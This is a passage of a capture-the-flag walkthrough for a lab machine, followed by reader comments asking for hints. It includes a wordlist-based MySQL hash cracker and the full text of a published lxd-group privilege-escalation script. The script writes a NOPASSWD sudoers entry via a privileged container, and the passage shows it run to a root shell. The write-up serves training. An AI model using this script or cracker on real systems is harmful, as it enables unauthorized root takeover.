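    table = {mysql_native_password(w): w for w in wordlist}
    hits: Dict[str, str] = {}
    for user, h in user_hashes.items():
        if h == "":
            hits[user] = ""
        elif h.upper() in table:
            hits[user] = table[h.upper()]
    return hits


# Constructed sample: the hashes are computed here so the demo is self-contained.
SAMPLE_USERS = {
    "root": "",
    "alice": mysql_native_password("password"),
    "bob": mysql_native_password("Tr0ub4dor&3-long-random"),  # not in the wordlist
}
WORDLIST = ["123456", "password", "qwerty", "letmein"]

if __name__ == "__main__":
    print(find_weak(SAMPLE_USERS, WORDLIST))  # {'root': '', 'alice': 'password'}
```

The empty hash for root in the dump deserves as much attention as a crackable one: it means no password at all on that account, so the audit reports it explicitly.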
Now exit mysql and switch to user smith.
MariaDB [mysql]> exit;
Bye
nicky@nsa-server:/home/nicky/Documents$ su smith
Password:
smith@nsa-server:/home/nicky/Documents$ id
uid=1001(smith) gid=1001(smith) groups=1001(smith),8(mail),999(lxd)
EoP 6 – Smith > Root
This user is part of the lxd group.
Lucky for us, membership of the lxd group is effectively root-equivalent on a Linux system running LXD: a member can drive the LXD daemon, which runs as root, and that is a known privilege-escalation path.
smith@nsa-server:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:01:e2:4b brd ff:ff:ff:ff:ff:ff
    inet 192.168.20.130/24 brd 192.168.20.255 scope global ens33
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe01:e24b/64 scope link
       valid_lft forever preferred_lft forever
3: lxdbr0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default qlen 1000
    link/ether ce:1a:73:37:ea:85 brd ff:ff:ff:ff:ff:ff
    inet 10.14.185.1/24 scope global lxdbr0
       valid_lft forever preferred_lft forever
    inet6 fe80::cc1a:73ff:fe37:ea85/64 scope link
       valid_lft forever preferred_lft forever
As we can see, there is an interface named lxdbr0.
This is the LXD bridge, the virtual network interface that connects containers to the host.
Let's see if there is a container defined already.
smith@nsa-server:~$ lxc ls
bash: lxc: command not found
That's odd. lxc is the client program used to send commands to LXD and interact with its containers.
smith@nsa-server:~$ which lxc
Nothing.
smith@nsa-server:~$ find / -iname "lxc" 2>/dev/null
/etc/bash_completion.d/lxc
/usr/share/bash-completion/completions/lxc
/var/snap/lxd/common/lxc
/snap/bin/lxc
/snap/lxd/10756/bin/lxc
/snap/lxd/10756/commands/lxc
/snap/lxd/10756/lxc
/home/smith/snap/lxd/10756/.config/lxc
There is a folder /snap/bin with executables, which is not in our PATH.
smith@nsa-server:~$ ls -lah /snap/bin
total 8.0K
drwxr-xr-x 2 root root 4.0K Jun  9  2019 .
drwxr-xr-x 5 root root 4.0K Jun  9  2019 ..
lrwxrwxrwx 1 root root    7 Jun  9  2019 lxc -> lxd.lxc
lrwxrwxrwx 1 root root   13 Jun  9  2019 lxd -> /usr/bin/snap
lrwxrwxrwx 1 root root   13 Jun  9  2019 lxd.benchmark -> /usr/bin/snap
lrwxrwxrwx 1 root root   13 Jun  9  2019 lxd.buginfo -> /usr/bin/snap
lrwxrwxrwx 1 root root   13 Jun  9  2019 lxd.check-kernel -> /usr/bin/snap
lrwxrwxrwx 1 root root   13 Jun  9  2019 lxd.lxc -> /usr/bin/snap
lrwxrwxrwx 1 root root   13 Jun  9  2019 lxd.migrate -> /usr/bin/snap
And there is the lxc we need.
smith@nsa-server:~$ /snap/bin/lxc ls
+---------+---------+------+------+------------+-----------+
|  NAME   |  STATE  | IPV4 | IPV6 |    TYPE    | SNAPSHOTS |
+---------+---------+------+------+------------+-----------+
| nsa-lab | STOPPED |      |      | PERSISTENT |           |
+---------+---------+------+------+------------+-----------+
It looks like there is a container, but it's not running.
There is a known exploit for this particular scenario: a bash script that abuses the lxd group membership to mount the host's root filesystem inside a privileged container.
The script is written by initstring:
#!/bin/bash

# Local root exploit by initstring (github.com/initstring/lxd_root)
# This takes advantage of any member of ability for any member of the local
# `lxd` group to mount the host root filesystem into a container, hijacking
# the privileges of root.
#
# We can then use the high-privilege mount to modify the /etc/sudoers file.

USAGE="$(basename "$0") <container name>
The exploit currently requires an existing container."

if [ $# -eq 0 ]
then
    echo "$USAGE"
    exit 0
fi

echo "[+] Stopping container $1"
lxc stop "$1"

echo "[+] Setting container security privilege on"
lxc config set "$1" security.privileged true

echo "[+] Starting container $1"
lxc start "$1"

echo "[+] Mounting host root filesystem to $1"
lxc config device add "$1" rootdisk disk source=/ path=/mnt/root recursive=true

echo "[+] Using container to add $USER to /etc/sudoers"
lxc exec "$1" -- /bin/sh -c "echo $USER 'ALL=(ALL)' NOPASSWD: ALL >> /mnt/root/etc/sudoers"

echo "[+] Unmounting host root filesystem from $1"
lxc config device remove "$1" rootdisk

echo "[+] Resetting container security privilege to off"
lxc config set "$1" security.privileged false

echo "[+] Stopping the container"
lxc stop "$1"

echo "[+] Done! Enjoy your sudo superpowers!"
exit 0
The easiest way is to save this script to a file locally and scp it to the remote system.
n0w4n@lab:~/DefCon$ scp -P 222 lxd-exploit.sh smith@nsa-server.net:/home/smith
Let's see if the file arrived.
smith@nsa-server:~$ ls -lah
total 124K
drwxr-x--- 18 smith smith 4.0K Apr 22 15:38 .
drwxr-xr-x  8 root  root  4.0K Apr 10 14:40 ..
-rw-r-x---  1 smith smith  417 Apr 22 15:38 .bash_history
-rw-r-x---  1 smith smith  220 May 15  2017 .bash_logout
-rw-r-x---  1 smith smith 3.6K Apr 10 20:58 .bashrc
drwxr-x--- 14 smith smith 4.0K Apr 14 13:19 .cache
drwxr-x--- 14 smith smith 4.0K Apr 14 13:19 .config
drwxr-x---  2 smith smith 4.0K May 10  2019 Desktop
drwxr-x---  2 smith smith 4.0K May 10  2019 Documents
drwxr-x---  2 smith smith 4.0K Apr 10 14:23 Downloads
-rw-r--r--  1 smith smith 1.3K Apr 22 15:34 exploit.sh
drwxr-x---  3 smith smith 4.0K May 10  2019 .gnupg
-rw-r-x---  1 smith smith 5.0K Apr 22 15:38 .ICEauthority
drwxr-x---  3 smith smith 4.0K May 10  2019 .local
-rw-r--r--  1 smith smith 1.3K Apr 22 15:35 lxd-exploit.sh
drwxr-x---  5 smith smith 4.0K May 10  2019 .mozilla
drwxr-x---  2 smith smith 4.0K May 10  2019 Music
-rw-------  1 smith smith  181 Apr 10 21:04 .mysql_history
drwxr-x---  2 smith smith 4.0K May 10  2019 Pictures
drwx------  3 smith smith 4.0K Apr 14 13:19 .pki
-rw-r-x---  1 smith smith  675 May 15  2017 .profile
drwxr-x---  2 smith smith 4.0K May 10  2019 Public
drwxr-xr-x  3 smith smith 4.0K Jun 10  2019 snap
drwxr-x---  2 smith smith 4.0K May 10  2019 .ssh
drwxr-x---  2 smith smith 4.0K May 10  2019 Templates
drwxr-x---  2 smith smith 4.0K May 10  2019 Videos
-rw-------  1 smith smith 8.4K Apr 22 15:34 .viminfo
-rw-r-x---  1 smith smith  256 Jun 10  2019 .wget-hsts
There it is.
Now make the script executable and run it.
smith@nsa-server:~$ chmod +x lxd-exploit.sh
smith@nsa-server:~$ ./lxd-exploit.sh nsa-lab
[+] Stopping container nsa-lab
./lxd-exploit.sh: line 20: lxc: command not found
[+] Setting container security privilege on
./lxd-exploit.sh: line 23: lxc: command not found
[+] Starting container nsa-lab
./lxd-exploit.sh: line 26: lxc: command not found
[+] Mounting host root filesystem to nsa-lab
./lxd-exploit.sh: line 29: lxc: command not found
[+] Using container to add smith to /etc/sudoers
./lxd-exploit.sh: line 32: lxc: command not found
[+] Unmounting host root filesystem from nsa-lab
./lxd-exploit.sh: line 35: lxc: command not found
[+] Resetting container security privilege to off
./lxd-exploit.sh: line 38: lxc: command not found
[+] Stopping the container
./lxd-exploit.sh: line 41: lxc: command not found
[+] Done! Enjoy your sudo superpowers!
Why is it not working? Remember the missing lxc command from earlier?
Either add the required folder to PATH or adjust the script.
Because it is faster to just adjust PATH, we go for that option.
smith@nsa-server:~$ export PATH=/snap/bin:$PATH
Now run the script again.
smith@nsa-server:~$ ./lxd-exploit.sh nsa-lab
[+] Stopping container nsa-lab
Error: The container is already stopped
Try `lxc info --show-log nsa-lab` for more info
[+] Setting container security privilege on
[+] Starting container nsa-lab
[+] Mounting host root filesystem to nsa-lab
Device rootdisk added to nsa-lab
[+] Using container to add smith to /etc/sudoers
[+] Unmounting host root filesystem from nsa-lab
Device rootdisk removed from nsa-lab
[+] Resetting container security privilege to off
[+] Stopping the container
[+] Done! Enjoy your sudo superpowers!
Let's check those superpowers.
smith@nsa-server:~$ sudo -l
Matching Defaults entries for smith on nsa-server:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User smith may run the following commands on nsa-server:
    (ALL) NOPASSWD: ALL
    (ALL) NOPASSWD: ALL
That will do.
smith@nsa-server:~$ sudo su -
root@nsa-server:~#
Now for the flag.
root@nsa-server:~# cd /root
root@nsa-server:~# ls -lah
total 164K
drwx------ 24 root root 4.0K Apr 10 21:45 .
drwxr-xr-x 24 root root 4.0K Jun  9  2019 ..
-rw-------  1 root root  163 Apr 14 13:22 .bash_history
-rw-r--r--  1 root root  570 May 14  2019 .bashrc
drwx------  9 root root 4.0K Jun 10  2019 .cache
-rwxr-xr-x  1 root root  171 Apr 10 17:05 clean.sh
drwx------ 11 root root 4.0K Jun 10  2019 .config
drwx------  3 root root 4.0K May 14  2019 .dbus
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Desktop
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Documents
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Downloads
drwxr-xr-x  4 root root 4.0K May 13  2019 endlessh
drwx------  3 root root 4.0K Jun  9  2019 .gnupg
drwx------  2 root root 4.0K Jun  9  2019 .gvfs
-rw-------  1 root root  338 Jun  9  2019 .ICEauthority
-rw-------  1 root root   39 Jun 10  2019 .lesshst
drwxr-xr-x  3 root root 4.0K May 14  2019 .local
drwx------  2 root root 4.0K Mar 10  2018 .mozc
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Music
-rw-------  1 root root 2.3K Apr 10 19:49 .mysql_history
-rw-r--r--  1 root root   30 Apr 10 13:09 names
drwxr-xr-x  2 root root 4.0K Jun 13  2018 .nano
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Pictures
drwx------  3 root root 4.0K May 14  2019 .pki
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Public
-rw-------  1 root root 1.0K Jun 10  2019 .rnd
-rw-r--r--  1 root root 7.8K Apr 10 20:44 root.txt
drwxr-xr-x  3 root root 4.0K Jun  9  2019 snap
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Templates
drwxr-xr-t  2 root root 4.0K Jun  9  2019 thinclient_drives
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Videos
drwxr-xr-x  2 root root 4.0K May 11  2019 .vim
-rw-------  1 root root  14K Apr 10 21:45 .viminfo
drwx------  2 root root 4.0K Jun  9  2019 .vnc
-rw-------  1 root root   56 Jun  9  2019 .Xauthority
-rw-------  1 root root 2.4K Jun  9  2019 .xsession-errors
root@nsa-server:~# cat root.txt
[ASCII-art banner of root.txt omitted; the file ends with the text below]
CONGRATULATIONS!!!! YOU JUST PWND THIS MACHINE
— finished —
And there you have it.
I really hope you liked this machine and the challenges it presented.
A shout-out would be appreciated and good luck with your next challenge…
Hi bro, why did I add nsa-server.net nsa-secretserver.net resolution under hosts, or redirect to nsa-server.net?
in hosts:
192.168.123.19 nsa-server.net nsa-secretserver.net
The /etc/hosts file is used by your system to look up hosts when connecting to them through a domain name instead of an IP address.
When your system wants to connect to another system by the use of a domain name and it doesn't know the IP address, it uses the name-servers that are available in its configuration (DNS).
But before it looks for the name-servers, it will check the hosts file first.
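To make the lookup order described in that reply concrete, here is an added example (not code from the write-up or its author): a small hosts-file parser and a resolver that consults the hosts table before falling back to a DNS lookup. The hosts text and the stand-in DNS table are constructed for the example.

```python
"""Added example: why an /etc/hosts entry takes precedence over DNS.
The hosts text and the stand-in DNS table below are constructed."""
from typing import Callable, Dict, Optional

# Constructed hosts file content, mirroring the entry from the comment above.
HOSTS_TEXT = """\
127.0.0.1   localhost
# lab box from the write-up; both names map to one address
192.168.123.19 nsa-server.net nsa-secretserver.net
"""


def parse_hosts(text: str) -> Dict[str, str]:
    """Map every hostname and alias to its address; '#' starts a comment."""
    table: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        addr, names = fields[0], fields[1:]
        for name in names:
            table.setdefault(name.lower(), addr)  # first matching entry is used
    return table


def resolve(name: str, hosts: Dict[str, str],
            dns_lookup: Callable[[str], Optional[str]]) -> Optional[str]:
    """Resolution order 'files, then dns': the hosts table is consulted
    first, so a hosts entry overrides whatever the name servers would say."""
    name = name.lower().rstrip(".")
    if name in hosts:
        return hosts[name]
    return dns_lookup(name)


# Constructed stand-in for DNS; it knows nothing about the lab host names.
FAKE_DNS = {"example.com": "93.184.216.34"}


def fake_dns_lookup(name: str) -> Optional[str]:
    return FAKE_DNS.get(name)


if __name__ == "__main__":
    hosts = parse_hosts(HOSTS_TEXT)
    for n in ("nsa-server.net", "nsa-secretserver.net", "example.com", "nowhere.test"):
        print(f"{n:22} -> {resolve(n, hosts, fake_dns_lookup)}")
```

Because the hosts file wins over DNS, its integrity matters on a real system: unexpected entries there are worth checking during host hardening and incident triage.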
Hi!
Any clues to escalate privileges to the “smith” user? Thank you in advance
Not really… any clue will give away the answer.
Hi,
I’d like to get a tiny nudge / push in the right direction for user “Smith”. Spend already more than a day on this user but nothing. None of the common tools or manual enumeration helped me.
Thanks!
do you have access to user smith already or do you try to get access to user smith?
We are the same, we try to access the user “smith”.
Which users do you already have compromised and from which user do you try to jump to user smith?
All users, I’m trying to jump from “Nicky” to “Smith”.
I have done: John > George > Samantha > Nicky
I need user Smith and Root.
In this phase… a basic recon is required.
You need to know what is happening on this machine and who has access to what.
When you figure that out, the solution is in front of you.
The only thing I found is:
Both John and Smith are members of the group 'mail'. I read a comment between John and Graham about Smith possibly reading their email. So maybe send some malicious email from John to Smith?
I already have tried something like that but until now not managed to get that to work and I am not sure if Smith is reading his mail every now and then?!
P.s.: If this message is too much spoiler then please reply by email to me please !
You’ve got mail 🙂
Thanks for the email. Did you also get my reply to it (I saw that you used a temporary email address)?!
I suspect your hint was about Smith -> Root (that will go via [SPOILER]?!), but first I need to become Smith via one of the other users (Nicky, Samantha, John or Graham) and I would like a hint about that 🙂
You’ve got mail 🙂
I have the same question, I’m with user “Nicky” and I’m looking for a way to pass to user “Smith”, could you give me some hint? (Do it by mail to avoid the spoiler). Thanks in advance.
With a basic recon, you will find something on the system that user Nicky has access to.
To get access you need a piece of information you probably don’t have yet, because of the way you escalated to this user.
Once you find those 2 things, the way to user smith will become clear.
I didn't receive an email on the 20th! Can you forward it again please?
Check my reply to David (21-6-2020)
got nicky, towards smith now
why is user smith that hard to escalate to?
I've been turning every stone in this machine and apparently I must have missed something…
Connecting with v.. to that desktop didn't reveal anything that I haven't seen from the terminal session.
I'm really stuck and would appreciate a small nudge to proceed.
Escalating to user smith isn’t that hard (I know it’s easy for me to say), but the path to take is relatively easy when you have all the information.
Look for files, then look for a service (you really need the file or you have no access to this service), enumerate your findings and escalate to user smith.
I just added escalating from Samantha to Nicky and I’ll be posting getting to smith next week.
Thanks for a really nice challenge. It was hard but very cool
glad you liked it